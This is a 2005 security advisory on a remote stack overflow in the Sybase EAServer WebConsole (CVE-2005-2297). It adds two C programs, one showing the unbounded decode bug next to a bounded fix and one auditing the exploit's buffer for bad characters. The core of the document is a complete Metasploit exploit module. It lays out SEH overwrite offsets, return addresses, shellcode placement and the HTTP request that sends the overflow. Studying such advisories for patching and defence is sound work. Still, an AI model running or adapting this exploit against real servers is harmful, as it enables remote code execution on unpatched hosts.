Sybase EAServer WebConsole Remote Buffer Overflow Vulnerability
Release date: 2005-07-18
Updated: 2006-05-04
Affected systems:
Sybase Enterprise Application Server 5.2
Sybase Enterprise Application Server 5.1
Sybase Enterprise Application Server 5.0
Sybase Enterprise Application Server 4.2.5
Sybase Enterprise Application Server 4.2.2
Sybase Enterprise Application Server 4.2
BUGTRAQ ID: 14287
CVE(CAN) ID: CVE-2005-2297
Description:
Sybase EAServer is a high-performance, scalable, secure and open application server for multi-tier e-portal and e-commerce solutions.
The WebConsole component of Sybase EAServer contains a remote stack-based buffer overflow. A remote attacker can exploit it to execute arbitrary code on the server.
A successful attack overflows a fixed-size stack buffer and allows arbitrary code to run with the privileges of the jagsrv.exe process. Note that the advisory states the attacker must hold valid authentication credentials to launch the attack, although the exploit module reproduced below sends its request to Login.jsp itself without logging in first.
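The bug class the advisory describes, as an added illustration that is neither Sybase code nor part of this advisory: a handler that decodes the value after Login.jsp? into a fixed-size stack buffer with no length check, next to a bounded version that refuses over-long input. The buffer size (QUERY_BUF), the function names and the percent-decoding step are assumptions chosen for the illustration; the real buffer size inside jagsrv.exe is not given anywhere on this page. The decoding step also shows why the exploit module's BadChars list contains %, +, & and the other query-string delimiters: a query-string decoder transforms or splits on those bytes, so they cannot be sent verbatim.

```c
#include <stdio.h>
#include <string.h>

#define QUERY_BUF 512          /* assumed fixed buffer size; not given in the advisory */

/* Hex digit value, or -1. */
static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

#ifdef VULNERABLE
/* Vulnerable shape: the decoded query goes into a fixed stack buffer and n is
 * never compared against its size. The module's 5000-byte query runs past
 * buf[] into the saved frame and the SEH record, which is what it overwrites.
 * Compiled only with -DVULNERABLE so the safe build below stays clean. */
static void login_handler_vuln(const char *uri)
{
    char buf[QUERY_BUF];
    const char *q = strchr(uri, '?');
    size_t n = 0;
    if (!q) return;
    for (q++; *q; q++) {
        if (*q == '%' && hexval(q[1]) >= 0 && hexval(q[2]) >= 0) {
            buf[n++] = (char)(hexval(q[1]) * 16 + hexval(q[2]));   /* %41 -> 'A' */
            q += 2;
        } else if (*q == '+') {
            buf[n++] = ' ';                                      /* '+' -> space */
        } else {
            buf[n++] = *q;                                       /* no bound on n */
        }
    }
    buf[n] = '\0';
    printf("login query: %s\n", buf);
}
#endif

/* Hardened: every write is bounded by outsz and an over-long query is
 * rejected rather than truncated. Returns the decoded length, or -1 when
 * there is no query string or it would not fit (terminator included). */
int decode_query(const char *uri, char *out, size_t outsz)
{
    const char *q = strchr(uri, '?');
    size_t n = 0;
    if (!q || outsz == 0) return -1;
    for (q++; *q; q++) {
        if (n + 1 >= outsz) return -1;     /* keep room for the terminator */
        if (*q == '%' && hexval(q[1]) >= 0 && hexval(q[2]) >= 0) {
            out[n++] = (char)(hexval(q[1]) * 16 + hexval(q[2]));
            q += 2;
        } else if (*q == '+') {
            out[n++] = ' ';
        } else {
            out[n++] = *q;
        }
    }
    out[n] = '\0';
    return (int)n;
}

/* Demo buffer and inputs (constructed, not captured from a real server). */
static char g_out[QUERY_BUF];

const char *demo_normal_login(void)
{
    return decode_query("/WebConsole/Login.jsp?user=%41B+C", g_out, sizeof g_out) < 0
           ? NULL : g_out;
}

/* A request shaped like the module's: "/WebConsole/Login.jsp?" + 5000 filler bytes. */
int demo_overflow_request(void)
{
    static char uri[22 + 5000 + 1];
    memset(uri, 'A', sizeof uri - 1);
    memcpy(uri, "/WebConsole/Login.jsp?", 22);
    uri[sizeof uri - 1] = '\0';
    return decode_query(uri, g_out, sizeof g_out);
}

int main(void)
{
    printf("normal:   %s\n", demo_normal_login());
    printf("overflow: %d (rejected)\n", demo_overflow_request());
    return 0;
}
```

Build the safe version with any C99 compiler; add -DVULNERABLE to compile the unbounded handler as well and compare the two loops side by side. The only difference is the single length check before each write, which is exactly what is missing in the bug class the advisory describes.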
<*Source: spilabs (spilabs@spidynamics.com)
  Links: http://marc.theaimsgroup.com/?l=bugtraq&m=112146180532313&w=2
         http://www.sybase.com/detail?id=1036742
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users act at their own risk!
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::sybase_easerver;
use strict;
use base "Msf::Exploit";
use Pex::Text;

my $advanced = { };

my $info =
{
    'Name'    => 'Sybase EAServer 5.2 Remote Stack Overflow',
    'Version' => '$Revision: 1.4 $',
    'Authors' => [ 'anonymous' ],
    'Arch'    => [ 'x86' ],
    'OS'      => [ 'win32', 'winxp', 'win2k', 'win2003' ],
    'Priv'    => 1,

    'AutoOpts' =>
    {
        'EXITFUNC' => 'thread'
    },

    'UserOpts' =>
    {
        'RHOST' => [1, 'ADDR', 'The target address'],
        'RPORT' => [1, 'PORT', 'The target port', 8080 ],
        'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
        'DIR'   => [1, 'DATA', 'Directory of Login.jsp script', '/WebConsole/'],
        'SSL'   => [0, 'BOOL', 'Use SSL'],
    },

    'Payload' =>
    {
        'Space'    => 1000,
        # The payload travels as a raw query string, so NUL, whitespace, CR/LF
        # and every byte that delimits or escapes a URL query must be avoided.
        'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\%",
        # add esp, -0xe1 ; inc esp  => esp -= 0xe0 without emitting the
        # 0x20 (space) byte that "add esp, -0xe0" would contain.
        'Prepend'  => "\x81\xc4\x1f\xff\xff\xff\x44", # make stack happy
        'Keys'     => ['+ws2ord'],
    },

    'Description' => Pex::Text::Freeform(qq{
        This module exploits a stack overflow in the Sybase EAServer Web
        Console. The offset to the SEH frame appears to change depending
        on what version of Java is in use by the remote server, making this
        exploit somewhat unreliable.
    }),

    'Refs' =>
    [
        ['BID', 14287],
    ],

    # [ name, pop/pop/ret address written into the SEH handler slot, offset of that slot ]
    'Targets' =>
    [
        # Technically we could combine these into a single multi-return string...
        [ 'Windows All - Sybase EAServer 5.2 - jdk 1.3.1_11', 0x6d4548ff, 3820],
        [ 'Windows All - Sybase EAServer 5.2 - jdk 1.3.?.?',  0x6d4548ff, 3841],
        # 0x08041b25 contains 0x25 ('%'), a byte listed in BadChars; BadChars
        # only constrains the encoded payload, so this address goes out as-is.
        [ 'Windows All - Sybase EAServer 5.2 - jdk 1.4.2_06', 0x08041b25, 3912],
        [ 'Windows All - Sybase EAServer 5.2 - jdk 1.4.1_02', 0x08041b25, 3925],
    ],

    'Keys' => ['easerver'],
};

sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
    return($self);
}

sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_idx  = $self->GetVar('TARGET');
    my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
    my $dir         = $self->GetVar('DIR');
    my $target      = $self->Targets->[$target_idx];

    $self->PrintLine( "[*] Attempting to exploit " . $target->[0] );

    my $s = Msf::Socket::Tcp->new(
        'PeerAddr' => $target_host,
        'PeerPort' => $target_port,
        'SSL'      => $self->GetVar('SSL'),
    );
    if ( $s->IsError ) {
        $self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
        return;
    }

    # 5000 bytes of alphanumeric filler: none of these bytes is in BadChars
    # and the length reaches the SEH record for every target offset.
    my $crash = Pex::Text::AlphaNumText(5000);

    # Layout around the SEH record at $target->[2]:
    #   offset-4 .. offset-3  next-SEH slot: "jmp short +6", which skips the two
    #                         remaining filler bytes and the handler address
    #   offset   .. offset+3  SEH handler: pop/pop/ret address, little-endian
    #   offset+4 ..           encoded payload (at most 'Space' bytes)
    substr($crash, $target->[2] - 4, 2, "\xeb\x06");
    substr($crash, $target->[2]    , 4, pack("V", $target->[1]));
    substr($crash, $target->[2] + 4, length($shellcode), $shellcode);

    # The whole overflow string is sent as the raw query string of Login.jsp.
    $dir = $dir . "Login.jsp?" . $crash;

    my $request =
        "GET $dir HTTP/1.1\r\n".
        "Accept: */*\r\n".
        "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
        "Host: $target_host:$target_port\r\n".
        "Connection: Close\r\n".
        "\r\n";

    $s->Send($request);
    $self->PrintLine("[*] Overflow request sent, sleeping for four seconds");
    select(undef, undef, undef, 4);
    $self->Handler($s);
    return;
}

1;
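An added check that is not part of the Metasploit module above: it rebuilds the overwrite buffer exactly as Exploit() lays it out (alphanumeric filler, the two-byte jmp short at offset-4, the little-endian handler address at offset, the payload at offset+4) and scans the result for bytes from the module's own BadChars string. The return addresses, offsets and bad-character set are copied from the module; the filler is a single 'A' standing in for AlphaNumText(5000), and the payload is a constructed stand-in (the module's Prepend stub followed by an int3). The framework encoder applies BadChars only to the payload, never to the hard-coded handler address, so this is a check the module itself does not perform: for the two JDK 1.4 targets the address 0x08041b25 puts a 0x25 ('%') byte into the URL, and the audit reports it at the target offset.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CRASH_LEN 5000   /* Pex::Text::AlphaNumText(5000) */

/* Unique byte set spelled out by the module's 'BadChars' string. */
static const unsigned char BAD_CHARS[] = {
    0x00, 0x0a, 0x0b, 0x0d, 0x20, 0x23, 0x24, 0x25, 0x26, 0x2b,
    0x2c, 0x2d, 0x2e, 0x2f, 0x3a, 0x3b, 0x3d, 0x3f, 0x5c
};

int is_bad_char(unsigned char c)
{
    for (size_t i = 0; i < sizeof BAD_CHARS; i++)
        if (BAD_CHARS[i] == c) return 1;
    return 0;
}

/* Lay the buffer out as the module's three substr() calls do:
 *   offset-4: "\xeb\x06"    jmp short +6 in the next-SEH slot; lands at offset+4
 *   offset  : pack("V",ret) SEH handler = pop/pop/ret, little-endian
 *   offset+4: payload
 * Returns 0 if the layout does not fit in buflen, else buflen. */
size_t build_seh_buffer(unsigned char *buf, size_t buflen, uint32_t ret,
                        size_t offset, const unsigned char *sc, size_t sclen)
{
    if (offset < 4 || buflen < offset + 4 + sclen) return 0;
    memset(buf, 'A', buflen);          /* stand-in for the alphanumeric filler */
    buf[offset - 4] = 0xeb;
    buf[offset - 3] = 0x06;
    for (int i = 0; i < 4; i++)        /* little-endian, like pack("V") */
        buf[offset + i] = (unsigned char)(ret >> (8 * i));
    memcpy(buf + offset + 4, sc, sclen);
    return buflen;
}

/* Offset of the first byte in the bad-char set, or -1 if the buffer is clean. */
long first_bad_byte(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (is_bad_char(buf[i])) return (long)i;
    return -1;
}

/* Audit one (ret, offset) row from the module's 'Targets' table.
 * Returns -1 for a clean buffer, -2 if the layout does not fit,
 * otherwise the offset of the first bad byte. */
long audit_target(uint32_t ret, size_t offset)
{
    static unsigned char buf[CRASH_LEN];
    /* Constructed stand-in payload: the module's Prepend stub followed by int3.
     * A real payload comes from the framework encoder, which already honours
     * BadChars; only the hard-coded handler address escapes that filter. */
    static const unsigned char sc[] = { 0x81, 0xc4, 0x1f, 0xff, 0xff, 0xff, 0x44, 0xcc };
    if (!build_seh_buffer(buf, sizeof buf, ret, offset, sc, sizeof sc)) return -2;
    return first_bad_byte(buf, sizeof buf);
}

int main(void)
{
    static const struct { const char *name; uint32_t ret; size_t offset; } targets[] = {
        { "jdk 1.3.1_11", 0x6d4548ff, 3820 },
        { "jdk 1.3.?.?",  0x6d4548ff, 3841 },
        { "jdk 1.4.2_06", 0x08041b25, 3912 },
        { "jdk 1.4.1_02", 0x08041b25, 3925 },
    };
    for (size_t i = 0; i < sizeof targets / sizeof targets[0]; i++) {
        long at = audit_target(targets[i].ret, targets[i].offset);
        if (at < 0)
            printf("%-13s ret=0x%08x offset=%zu: no bad chars\n",
                   targets[i].name, (unsigned)targets[i].ret, targets[i].offset);
        else
            printf("%-13s ret=0x%08x offset=%zu: bad char at %ld (%s)\n",
                   targets[i].name, (unsigned)targets[i].ret, targets[i].offset, at,
                   at >= (long)targets[i].offset && at < (long)targets[i].offset + 4
                       ? "handler address" : "filler or payload");
    }
    return 0;
}
```

Compile with any C99 compiler and run; the program prints one line per target row. Whether a raw '%' survives the server's query parsing is not something this advisory states, so the audit shows only that the module's own constraint is violated for those two targets, which is one more reason the description calls the exploit "somewhat unreliable".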
Recommendation:
Vendor patch:
Sybase
------
The vendor has released a patch to fix this security issue; download it from the vendor's site:
http://downloads.sybase.com/